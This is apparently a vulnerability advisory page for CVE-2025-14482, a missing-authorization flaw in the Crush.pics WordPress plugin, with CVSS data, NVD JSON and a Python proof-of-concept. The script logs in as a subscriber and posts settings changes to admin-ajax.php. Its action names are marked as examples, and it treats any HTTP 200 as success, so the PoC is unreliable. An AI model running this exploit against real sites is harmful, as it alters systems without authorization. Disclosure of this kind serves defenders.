Security Vulnerability Report
中文
CVE-2025-14482 CVSS 4.3 MEDIUM

CVE-2025-14482

Published: 2026-01-14 06:15:53
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The Crush.pics Image Optimizer - Image Compression and Optimization plugin for WordPress is vulnerable to unauthorized modification of data due to missing capability checks on multiple functions in all versions up to, and including, 1.8.7. This makes it possible for authenticated attackers, with Subscriber-level access and above, to modify plugin settings including disabling auto-compression and changing image quality settings.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Crush.pics Image Optimizer WordPress插件 <= 1.8.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys from urllib.parse import urlencode # CVE-2025-14482 PoC - Insecure Direct Object Reference in Crush.pics Plugin # Target: WordPress site with Crush.pics Image Optimizer <= 1.8.7 # Authentication: Requires any valid user account (Subscriber role or higher) def exploit_crush_pics(target_url, username, password): """ Exploit missing capability checks in Crush.pics plugin settings modification. """ # Step 1: Authenticate and get valid nonce/cookie login_url = f"{target_url}/wp-login.php" session = requests.Session() login_data = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': target_url } print(f"[*] Authenticating as {username}...") response = session.post(login_url, data=login_data, allow_redirects=False) if 'wordpress_logged_in' not in session.cookies.get_dict(): print("[-] Authentication failed!") return False print("[+] Authentication successful!") # Step 2: Get admin URL to extract nonce (if needed) # In some cases, the AJAX endpoint may not require nonce verification # Step 3: Exploit - Disable auto-compression ajax_url = f"{target_url}/wp-admin/admin-ajax.php" # Payload 1: Disable auto-compression feature disable_auto_data = { 'action': 'crush_pics_disable_auto', # Example action name 'setting': 'auto_compression', 'value': '0' } print("[*] Attempting to disable auto-compression...") response = session.post(ajax_url, data=disable_auto_data) if response.status_code == 200: print("[+] Auto-compression disabled successfully!") # Payload 2: Modify image quality settings quality_data = { 'action': 'crush_pics_update_quality', # Example action name 'quality': '100', # Set to maximum (no compression) 'format': 'png' # Change output format } print("[*] Attempting to modify image quality settings...") response = session.post(ajax_url, data=quality_data) if response.status_code == 200: print("[+] Image quality settings modified!") print("[*] Exploitation complete. Check plugin settings in WordPress admin panel.") return True if __name__ == "__main__": if len(sys.argv) < 5: print(f"Usage: python {sys.argv[0]} <target_url> <username> <password>") print(f"Example: python {sys.argv[0]} http://example.com subscriber password123") sys.exit(1) target = sys.argv[1] user = sys.argv[2] pwd = sys.argv[3] exploit_crush_pics(target, user, pwd)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14482", "sourceIdentifier": "[email protected]", "published": "2026-01-14T06:15:52.597", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Crush.pics Image Optimizer - Image Compression and Optimization plugin for WordPress is vulnerable to unauthorized modification of data due to missing capability checks on multiple functions in all versions up to, and including, 1.8.7. This makes it possible for authenticated attackers, with Subscriber-level access and above, to modify plugin settings including disabling auto-compression and changing image quality settings."}, {"lang": "es", "value": "El plugin Crush.pics Image Optimizer - Compresión y Optimización de Imágenes para WordPress es vulnerable a la modificación no autorizada de datos debido a la falta de comprobaciones de capacidad en múltiples funciones en todas las versiones hasta la 1.8.7, inclusive. Esto hace posible que atacantes autenticados, con acceso de nivel Suscriptor y superior, modifiquen la configuración del plugin, incluyendo la desactivación de la autocompresión y el cambio de la configuración de calidad de imagen."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/crush-pics/trunk/inc/class-ajax.php#L193", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/crush-pics/trunk/inc/class-ajax.php#L30", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/crush-pics/trunk/inc/class-ajax.php#L66", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/5e71bf15-aee0-4efc-a1c6-faad9f6e4f38?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.